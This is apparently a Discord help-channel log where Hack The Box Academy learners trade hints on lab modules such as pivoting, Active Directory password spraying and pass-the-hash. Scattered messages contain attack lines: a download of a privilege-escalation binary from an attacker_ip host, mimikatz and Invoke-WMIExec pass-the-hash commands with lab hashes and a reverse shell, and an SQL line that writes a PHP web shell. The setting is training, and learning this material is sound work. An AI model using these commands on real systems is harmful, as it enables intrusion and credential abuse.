umbral fulcrum
acoustic owl
#

For this Question?
What is the password for the "mssqlsvc" user? - No

#

For this Question?
Enumerate the "flagDB" database and submit a flag as your answer. - Yes

umbral fulcrum
#

oohhh I think I got it, thanx

wanton estuary
#

For pivoting skills accessment pivot host has internal ip 172.16.5.15/16 does this mean I have to scan the whole range 172.16.0.0/16 with nmap or 172.16.5.0-245? To discover hosts on that are accessible through the pivot host?

proud pine
wanton estuary
proud pine
umbral fulcrum
wanton estuary
primal eagle
#

Jeez my target spawning is taking ages

#

am I the only one? Or is the deployment system down?

odd tendon
#

Hi I am new, I have a question if anyone can answer it.

In the “ACTIVE DIRECTORY ENUMERATION & ATTACKS” module under the “Internal Password Spraying - from Windows” section, I cannot use the “DomainPasswordSpray.ps1. To elaborate, it won’t generate the UserList even though in the section it said the script automatically created one. I tried using a different namelist like jsmith.txt and john.txt but they all just freeze at

[*] Setting a minute wait in between sprays.

Any advice?

wispy aspen
knotty hemlock
#

Hi, can anyone help me with the final Skill Assessment for the HTTPS/TLS Module? I can't decode the cookie value, i guess my payload is wrong? any help appreciated

analog dock
#

<@&861185840277487616>

warm kernel
#

can anyone direct me to any course on htb that helps with rpc? I keep landing on boxes that has some of these open, and I never know how to approach them.

barren apex
warm kernel
#

not explicitly finding those

barren apex
#

my bad, maybe they dont

#

been a minute since ive done them,

analog dock
#

Footprinting has a part of it I think

#

Yup, footprinting - smb

warm kernel
#

yup, just found it, thanks!

analog dock
#

You’re welcome

quick magnet
#

hi i'm stuck in Pass the Ticket (PtT) from Linux

question:
Check svc_workstation's sudo privileges and get access as root. Submit the flag in /root/flag.txt directory as the response

what im doing:

  • try ssh david got password carlos
  • ssh carlos, got svc_workstation's AES-256 HASH

i see many people fail when try hashing AES-256, is it the correct way to try hashing AES-256 ?
anyion can give me a hint ?

trail leaf
#

Can’t crack that afaik, there’s another file in the general area that will give you the NTLM hash

quick magnet
broken abyss
#

hello. please i need help in login brute force module , cracking the password of admin user any hints

high reef
#

i'm in module password attacks PTH(pass the hash)

#

i ran mimikatz

#

but i get acces denied

pulsar needle
odd tendon
pulsar needle
#

You are only listing the file via DC01

#

Ah, my message got deleted, f lol

#

Can someone please help me? Ive got the user ||Fiona|| and the password and logged in via RDP, but I cannot find the user I can impersonate to get admin

fathom pendant
#

I mean if you check c:\users maybe or do sql from the command line you might have better luck

pulsar needle
#

The thing is

#

Ive done that but I cant upload screenshots because they get deleted, even if I put them as spoilers

#

Ive found 6 users, and 1 user that is a part of the local administrators group, but that 1 user isnt correct

fathom pendant
#

Proper capitalisation?

#

Iirc this was dumb

pulsar needle
#

Look at them fast before they get deleted

#

thats all ive found

fathom pendant
#

Sir

#

If this is about using mssql

#

That has impersonate permissions

#

And should probably look there first

pulsar needle
#

Wha, but aaa the way they make it seem

#

Like find her password, (I found it through rdp) and then it tells me once I am logged in, like as in RDP I thought

fathom pendant
#

What section is this for?

high reef
fathom pendant
#

So I can look up

fathom pendant
#

Lol

#

It's not a local file

pulsar needle
fathom pendant
fathom pendant
fathom pendant
pulsar needle
#

cat the file inside the folder

fathom pendant
#

It'll be type

pulsar needle
#

asaaa

#

yes, i meant type, lol

umbral fulcrum
#

hey I'm stuck at "Attacking Common Services " : "Attacking DNS"
I'm not sure I understand the Q
I found (using subbrute.py & names_small.txt) few subdomains I not sure what the meaning of "submit the flag found as a DNS record as the answer" since I didn't found any flag....
some 1 have a hit ?

vital adder
high reef
pulsar needle
high reef
fathom pendant
vital adder
high reef
fathom pendant
pulsar needle
vital adder
fathom pendant
vital adder
fathom pendant
#

The question isn't I don't think

#

They just posted a bunch of stuff about mssql earlier

#

¯_(ツ)_/¯

#

It got yeeted by a mod

high reef
vital adder
#

@pulsar needle if you are on question 3 then it's definitely mssql

pulsar needle
#

But the credentials dont work for MSSQL, and I cant bruteforce it

vital adder
fathom pendant
pulsar needle
vital adder
fathom pendant
#

I'm not lol

high reef
pulsar needle
gloomy bramble
high reef
pulsar needle
#

I think the way is locally, but I have no clue how to do that xd

vital adder
high reef
#

i have a meeting in 3mins so i'll have to pause for a few. i'll be back in an hr

vital adder
#

@high reef the quickest way to confirm that you still have access to the dc is running the previous dir command that you run and if you can still see the flag that's mean you still have access and can just get the flag

#

but if you get permission denied then just run the attack again

#

also my bad for the ticket thing

high reef
vital adder
pulsar needle
fathom pendant
#

Try just the command with no parameters

pulsar needle
#

OH WAIT

#

lol, nvm

#

I thought, lmao ,f

high reef
fathom pendant
vital adder
#

also stop sending screenshot with cred or other spoiler even with the spoiler it's still a big no no

*that screenshot have 1 sqlcmd command so it's least to say no need to remove that

high reef
#

got the flag

pulsar needle
#

k

spring zenith
#

Hi im stuck with keeper. i have user flag and now doing the PoCs exploid, but cant guess the pass that is given to me. And hints? Thanks in advance ! 🙂

knotty hemlock
#

did you solve it? im stuck at the same point @west spindle

fathom pendant
subtle glen
#

windows privesc skills assessment 1
i think it involves ||juicypotato|| and i want to try it, how can i transfer the files to the server so i can test it? i tried with an http server and wget but it did not work, i tried curl too

odd tendon
#

Hi I am new, I have a question if anyone can answer it.

In the “ACTIVE DIRECTORY ENUMERATION & ATTACKS” module under the “Internal Password Spraying - from Windows” section, I cannot use the “DomainPasswordSpray.ps1. To elaborate, it won’t generate the UserList even though in the section it said the script automatically created one. It freezes at

[*] Setting a minute wait in between sprays.

Any advice?

trail leaf
keen oasis
trail leaf
#

There are many options out there, just search "file transfers ctf" or "file exfiltration hacking" and you'll find stuff. If one doesn't work, try another, or double check your syntax and troubleshoot exactly where things aren't going as planned

vital adder
#

<@&861185840277487616>

#

pls give this ass eat clown the 👢

high reef
#

i'm having issues getiing the reverse shell

pulsar needle
# pulsar needle OH WAIT

https://academy.hackthebox.com/achievement/285625/116 ez flag after i found out i was supposed to logon to the mssql server lol

vital adder
#

there is spoiler in both screenshot

high reef
vital adder
#

you and Noke1 should look into tools like greenshot and flameshot to censor cred, hash and other spoiler

vital adder
fresh pine
#

Hi, troube in **Attacking Common Applications >> Exploiting Web Vulnerabilities in Thick-Client **.

I follow the steps, but when I try to compile: C:> javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\client\gui\ClientGuiTest.java - gives me 31 errors in the code...
Now, I changed only what they said

Any help, ideas would be welcomed 🙏

vital adder
#

oh then again my bad 🤣

high reef
#

only difference i see is that they are using svc_workstation

pulsar needle
#

💀 Attacking AD is awfully close, and scary, its like a boss approaching

vital adder
#

don't worry it's won't kick you in the ball

vital adder
drifting glacier
#

Anyone around that has done the Value Fuzzing section for the "Attacking Web Applications with FFUF" module?

vital adder
#

sure what's the issue?

drifting glacier
#

The section is not accepting my flag answer, even though the flag is being returned to me in the curl command, just as the module described it should return

vital adder
#

so basically you have the flag but the section doesn't accept that flag?

drifting glacier
#

Yep, here is a shot:

vital adder
#

yep you definitely need to remove that before a mod do it for you

#

but which section are you on?

drifting glacier
#

holy hell, never mind, i had a space in the answer at the end of the value. yea i was going to delete after posting

#

thanks for the response though lol

vital adder
#
#

also that guy have cheat sheet on decompiling + compiling the client

subtle glen
trail leaf
#

You can just specify an absolute path. Something like IWR http://attacker_ip/potato.exe -Outfile C:\Users\Public\vegetable.exe

#

and then C:\Users\Public\vegetable.exe [OPTIONS]

vital adder
subtle glen
vital adder
#

if you are trying the get a shell from revshells.com then that's generally don't work for me, for windows box if i need a shell i usually go for hoaxshell or meterpreter

subtle glen
high reef
#

these are the steps i took, mimikatz and with MS01 creds (this is to enable the lister with MS01 as the user as the question states that the machine will only connect back to MS01). This executes with no errors, however when whoami is passed, the user printed is still julio (to try and mitigate error I tried the same process when RDPing using admin creds which allowed me to PTH into MS01). This was done using the following command:

mimikatz.exe privilege::debug “sekurlsa::pth /user:MS01 /rc4:27306e8dad558c047eb35761abb16fc1 /domain:inlanefreight.htb /run:cmd.exe” exit

A nc listner is configured to listen on any 8001.

Finally, using powershell the following commands are executed to catch the shell (the following socket was configured in powershell3 base64 rev shell gen - 127.16.1.5:8001):

Import-Module .\Invoke-TheHash.psd1

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command “powershell -e ‘’‘base64 here’‘’”

Note: all instances of cmd and ps are run as admin.

I have tried this sequence various times, on my local machine and with the pwnbox and I just cant get it to work. I’m thinking my error lies in step 6 where I cant PTH to MS01.

#

i did not copy the reverse shell base 64 in module i copied it from website and still having issues

rustic sage
#

Hi

#

Can i know what is this

grim solar
#

hi guys im a beginner in cybersecurity, can you tell me how to get started and what to install like kali linux or what

rustic sage
#

Any*

vital adder
#

@rustic sage @grim solar pls read #rules and #welcome if you guys are new here

#

keep asking for shit like that and you will get the 👢 buddy

rustic sage
#

Ok my bad

grim solar
#

just wanted to know how to get started

compact patrolBOT
vital adder
tulip parrot
#

Attacking Common Services
Attacking Common Services - Easy

Hello, i am struggling to upload a shell
I tried with mariaDB a lot, and the cmd command dont get me result except of "dir". If i go higher it say that i am not authorized to access.
I tried to code base64 more complexe code to avoid "" '' with no success
The code I use is ||SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\xampp\htdocs\cmd.php";||
If there is another way of uploading a file I would be please to try

THx

rapid sparrow
#

any idea with this???

#

Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01

#

I have done pth and could not remote to DC01

pine dagger
#

Your screenshot has spoilers in it. You should probably delete it, or blank out the spoilers.

pine dagger
#

You're on question 8 of Ad Enum Skill Assessment 2?

rapid sparrow
pine dagger
#

... i meant you should blank it out from the image. 🙂

#

The username and hash are part of some of the answers

rapid sparrow
pine dagger
#

User: in mimikatz output 😉

rapid sparrow
fathom pendant
#

/domain:dc01

rapid sparrow
#

I hate that...

pine dagger
#

But to answer your question, I used impacket-wmiexec via a proxychain

fathom pendant
#

You don't need to specify .inlanefreight.local

#

Just dc01

#

At least I don't believe you do

elder moon
#

any hint for module- 77 section- 844

rapid sparrow
pine dagger
fathom pendant
#

What's the module and section name

elder moon
#

"Privilege Escalation" module of "Getting started"

pine dagger
#

And no, my hash was different

#

But I had the admin hash 🙂

fathom pendant
misty current
# rapid sparrow

Do you specify FQDN in /domain ? I don't think you can remote to DC01 with this method.

pale oriole
rapid sparrow
misty current
#

You just specify the domain not FQDN and get process created that will pop in your own system but that shell is in your own system and not any other remote.
If you want remote to DC01, you'll have to follow what wolfie said.

tender lake
#

I'm completely stuck on the skill assessment for Pivots, question 4.
I have managed to upload a payload to the webserver but I cannot execute it with ./payloadname.

#

How am I supposed to actually do anything though?

pine dagger
acoustic owl
#

If so, what exactly is the problem?

tulip parrot
#

i can't upload it 😢

acoustic owl
tender lake
patent sphinx
#

i need help.

#

i am trying to connect to openVPN and i have done so using the sudo openvpn {fileName} and in my HTB home page it shows as connected. the problem is that when i try to ping a machine it can't reach it

#

this problem has been reoccurring, and haven't found any reliable way of fixing it. it just works if it wants to :/

tawny moss
#

hey ! i'm a beginner, i'm reading the difference between TCP and UDP ports, do you have a good example where "UDP is suitable for applications that run time-sensitive tasks since dropping packets is faster than waiting for delayed packets due to retransmission" ? thanks!

tawny moss
#

oh! make sense! thank you!

leaden pond
#

Hi everyone. I'm working on the MSSQL section of the Footprinting module, and I'm having trouble with the second question. I cloned the impacket repository from GitHub, navigated to the subdirectory containing mssqlclient.py, and ran the command "python3 mssqlclient.py backdoor@10.10.10.10 -windows-auth" (replacing 10.10.10.10 with the IP of my target). I get this error: No module named "impacket.examples.mssqlshell" This same error occurs in both the Pwnbox and my Kali VM.

trail leaf
#

If you’re on Kali, try using impacket-mssqlclient instead of mssqlclient.py

#

Impacket installs can be a nasty thing to debug so hopefully this will just work

#

Oh wait I’m on mobile, didn’t see the full command. Try calling mssqlclient.py by itself, don’t navigate to the directory, just call it as you would any normal command

leaden pond
#

When I run the same command from any directory not containing the mssqlclient.py file, I get a file not found error.

trail leaf
#

Hm, then try impacket-mssqlclient

leaden pond
#

That did the trick!

#

I didn't realize there was a pre-installed package called impacket on Kali already. Didn't even need to clone the repo from GitHub. Just replaced "python3 mssqlclient.py" in the command I posted above with "impacket-mssqlclient" as suggested, and it worked. Thanks a ton!

zinc marsh
#

I need a hint for broken authentication skills assessment please

trail leaf
acoustic owl
thorn urchin
sly dome
#

should not i have the button here to download vpn config?

#

somewhere around there XD

#

ya i know its on profile but why would they remove it xD it was handy

supple patio
#

lol

sly dome
#

HAHAH

#

so my profile is broken or what

#

there is no button

#

weird

#

any mods

#

did

#

thx

#

not even loading on another browser

#

thats the link on the button

pine dagger
#

because someone spammed the other day

sly dome
#

i figured it out

#

it happens when the service to exploit is a web server

#

because this web servers are open to the internet (i could access from my phone)

#

cool thanks 😎

narrow solar
#

tried to fuzz the new parameter but no result

#

tried /index.php?lo$$=access.log but the parameter only returns the main page

opal jewel
#

Has anyone ran into any issues during Exploiting Web Vulnerabilities in Thick-Client Applications? I cannot get the server.jar to download to save my life, just outputs to screen. Maybe its time to give it a break

thorn urchin
opal jewel
thorn urchin
#

Likely mixed up editing from the previous example that has you display it.

opal jewel
#

You are probably correct

sleek shell
#

Hi guys! Can someone help me with Footprinting medium lab? I got stuck in building query in MSSQL.

odd tendon
#

Can someone help me with the Internal Password Spraying - from Windows module?

tender lake
#

Just finished the Pivoting module, but I don't think I did the skill assessment in the best way, especially for the last question. Would love to pick someones brain on how to do this properly sometime

quaint hemlock
#

Import the Library-Question library appropriate for your OS and dotNet version, using the HTBLibrary namespace. What is the output of the Flag.GetFlag() method from the library?

hi, I'm stuck at this question (Introduction to c# module libraries section) and I don't know why
this is my code using HTBLibrary; class test { static void Main(string[] args) { Flag.GetFlag(); } }

and I got this error error CS0246: The type or namespace name 'HTBLibrary' could not be found. Are you missing an assembly reference?

thorn urchin
#

Havnt done that module but review any setup instructions they have for the exercise

burnt sluice
burnt sluice
burnt sluice
glad edge
burnt sluice
# quaint hemlock Import the Library-Question library appropriate for your OS and dotNet version, ...

This Link says that one of the reasons might be a missing .dll file.
you can check the references in your project and make sure you have it there.
it also might be any other thing mentioned there but this one seems the most reasonable.

Learn how to manage references to external components and connected services in a project.

odd tendon
#

Can someone help me?

thorn urchin
odd tendon
# thorn urchin

lol good point, I am stuck on the Internal Password Spraying - from Windows module, it is apart of the ACTIVE DIRECTORY ENUMERATION & ATTACKS .

thorn urchin
#

and

#

you need to provide information on what youre stuck on, what youve tried, ect ect

gloomy bramble
odd tendon
# thorn urchin you need to provide information on what youre stuck on, what youve tried, ect ec...

okay cool, this room is supposed to be simple. RDP into the target IP and use the DomainPasswordSpray.ps1 for the password 'Winter2022' and submit the user's username as the answer. However, the script freezes at the "[*] Setting a minute wait in between sprays" line and doesn't progress. I have tried supplying a userlist, redownloading the script, manually adjusting the script, searching online for a hint, trying to run other tools. I have been unsuccessful at every turn. Someone earlier attempted to provide an answer but they completely missed my problem and told me something I already knew. I did appreciate his help. Do you have any hint that you could give me?

thorn urchin
odd tendon
# thorn urchin whats the exact command youre running

it is a two part command

First: Import-Module .\DomainPasswordSpray.ps1

Second:Invoke-DomainPasswordSpray -Password Winter2022 -OutFile spray_success -ErrorAction SilentlyContinue

I've also tried running .\DomainPasswordSpray.ps1 -Password Winter2022

odd tendon
thorn urchin
#

hmmm yeah shouldnt be giving an issue. Not sure why itd be grabbing the lockout window like that cause the lab shouldnt have one

#

Id just edit out that function and have it return 0 but thats a little out of scope

odd tendon
#

the function at line 261?

thorn urchin
#

no thats just a print statement basically

#

how many minutes is it telling you

odd tendon
#

Oh yeah, I had to change that to ${Message} because it kept crashing at that line, which function do you advise I modify?

#

Minutes is empty

thorn urchin
#

empty??

odd tendon
#

Yeah, this line correct?

[*] The domain password policy observation window is set to minutes.

thorn urchin
#

Sounds like something is really wrong then. Junk the file and grab a fresh copy you havnt messed with

thorn urchin
#

oh looks like it is supposed to be empty afterall

odd tendon
thorn urchin
#

why are you using evil-winrm when it asks you to RDP in

odd tendon
#

RDP does not launch on the machine, I tried using xfreerdp, and rdesktop.

thorn urchin
#

Yes it does

odd tendon
#

Okay let me try it again

thorn urchin
#

Yeah just tested the lab, following the instructions provided worked

odd tendon
#

Got it!

thorn urchin
#

nice

buoyant apex
viscid tulip
#

Guys i wanna know something

#

U can see who is tracking ur stories facebook ?

odd tendon
fathom pendant
thorn urchin
faint rampart
viscid tulip
#

@fathom pendant og

thorn urchin
#

Seems like probably just some funkiness with evil-winrm

viscid tulip
#

Oh

odd tendon
fathom pendant
thorn urchin
#

I mean its the best at what it does

#

but its still janky af

odd tendon
thorn urchin
opaque mortar
#

Hey guys! I’m having trouble with the pre ignition machine I starting point tier 1
Specifically where I’m supposed to give the switch that finds php pages

#

Oh.. looks like the man page is incomplete

#

Found it

mossy hatch
#

Hi i'm having problem in the 'introduction to c#' module in the Libraries section, i can't import the Library-Question library (i'm using win x64 and dotnet 7.0)

worldly patrol
#

Are there any pathway specific rooms? Like for CREST?

fathom pendant
glossy coral
#

hi guys! I wanna ask how bug hunters do the job, I mean they not suddenly scanning some website after account registered right?
how about collaboration and coordination with website owner?

woven copper
#

Hello there, anyone could give a hand with Injection Attacks Skill assessment, I have been identify the PDF exploit but can't find the internal web app, thanks an advance

carmine hill
#

Advanced sql injection pwned in case someone needs help with it

wide river
#

just finish CPTS path today. I would like to say thank you to @west canopy @autumn pilot. These two hackthebox staffs were super helpful during my time learning CPTS. I gained a lots of knowledge thanks to them.

sharp grail
#

Hi,

I am stuck in the following question in AD - Living off thew land module

Utilizing techniques learned in this section, find he flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.

I understand that I need to change the filters accordsing to the instructions, but cannot seem to run dsquery. I believe i would need to priv esc to the local admin user which I have found from the previous question but not sure how to do so :/

novel shoal
umbral fulcrum
#

hey guy, I'm "Attacking Common Services" : "Attacking DNS" & kind of stuck, I'm not managing 2 do DNS transfer, what am I missing?

quick magnet
#

have u solve this easy lab ?

acoustic owl
quick magnet
umbral fulcrum
#

I used "subbrute" with "names_small" looked at all the ns of them, then tried axfr with them
none did it

umbral fulcrum
acoustic owl
pulsar needle
acoustic owl
umbral fulcrum
#

lol
I tried everything with the given data...

acoustic owl
obsidian crag
#

Hlw friends

#

One dought

#

Which option is need to set to execute a command as a different user using the "su" command ? (long version of the option)

high zinc
#

sudo however has --user=NAMEHERE

#

sudo --user=mto discord.sh

obsidian crag
#

I tried this also but i can't find the exam answer

#

Its a flag

#

Question of academy

wild dragon
#

su -h to view the options for executing commands

#

you should answer the option for it

obsidian crag
#

Let me try

fathom pendant
#

I mean reading the man page is also useful

#

There's a -c, --command= flag

wild dragon
fathom pendant
#

It's probably also explained in the section of the module

obsidian crag
#

Linux fundamental/page15/User management last flag answer ?

obsidian crag
wild dragon
#

what is your option for the answer?

obsidian crag
#

Sudo -h and -u

wild dragon
#
su -h

this command to view the options for the answer!
it's not the answer!

obsidian crag
#

Same as you told

fathom pendant
#

Sir

wild dragon
fathom pendant
#

What they are saying is that the answer is found by actually reading

#

And not just copy/paste and not understanding

obsidian crag
wild dragon
#

what is your answer? @obsidian crag

obsidian crag
#

Ohh yah

#

I got it

#

Thanks

fathom pendant
#

Good job you can read

#

Spoiler, I said that before you started diving into it

wild dragon
#

@obsidian crag don't be hurry
you should read and step by step to understand what you learned!

obsidian crag
#

Yup

wild dragon
#

remove your answer!, it will be ok

obsidian crag
#

Ok

fathom pendant
fathom pendant
radiant rivet
#

there is also curl cheat.sh/<command>

obsidian crag
#

Yesterday i have a dought

wild dragon
obsidian crag
#

I used curl command but all the time the connection got refussed

wild dragon
#

what is your section and your module?

obsidian crag
#

But i solved it

fathom pendant
#

Doubt*

#

Btw

thorn urchin
#

also English speakers never say "I have a doubt"

obsidian crag
#

I forgot about that..actually i already cleared that..it took updatedb

obsidian crag
fathom pendant
#

Well it depends what you're meaning to say

thorn urchin
#

At most english speakers will say, "I have my doubts" when speaking broadly to someone, or theyll say "I doubt X".

You also usually only say doubt if youre disbelieving something thats second hand knowledge to you. You wouldnt say you have doubts about something you did.

#

In your case, you would need to be more specific about what you meant to say.

thorn urchin
#

👍 its a very common mistranslation from people coming from certain languages

#

In the case of you were trying curl yesterday but having problems you would say something like, "I was having issues with this yesterday"

obsidian crag
#

How can i use curl for the real world system ?

thorn urchin
#

Do you mean what real world use does curl have? or something else?

obsidian crag
#

Else

#

I'm asking...how to use curl for the website of the real world ?

acoustic owl
#

Ex.
curl www.example.com shows you the source code of the website in the terminal

obsidian crag
#

But it's not working

acoustic owl
#

Provided the machine has access to the Internet and the name resolution works, this should work.

vital adder
#

anyone done the Credentials in Object Properties section on the Windows Attacks & Defense module? i'm stuck on question 3, i did filter for the id that's in the hint and that give me like forty something results but none of them are from bonni also try to filter using all 4 id under the Detection part on the section but that also didn't get me the answer and i did try to filter using some xml stuff, basically filter for TargetUserName as bonni which should give me all of bonni log but i got back 0 results which is kinda shocking (also the xml filter that i use work for other users)

vital adder
#

yep i try with 4 id under the Detection part and the one in the hint

acoustic owl
vital adder
#

yeah i was just getting the id that i used

zinc sentinel
#

hello all, anyone on to assit Attacking Enterprise Networks - Web Enumeration & Exploitation "Use the command injection vulnerability to find a flag in the web root. Submit the flag value as your answer (flag format: HTB{}). "
the last question ... i can see the XXXXflag.txt file.. wasted some hours trying read it by no go any sugguestion plz

proud pine
novel shoal
#

nice sections

autumn pilot
#

i'm pretty sure there is a note in the section that will guide you a bit

novel shoal
#

yeah im trying that

zenith reef
#

Hi.I want learn hacking,

zinc sentinel
acoustic owl
zenith reef
#

Why

#

?

acoustic owl
zenith reef
#

I love u

zinc sentinel
#

Thankyou Rat and payloadbunny that was a pretty good hint 😉

proud pine
zinc sentinel
#

Cheers 🍻
Added command Injection to my list to be worked on ✅️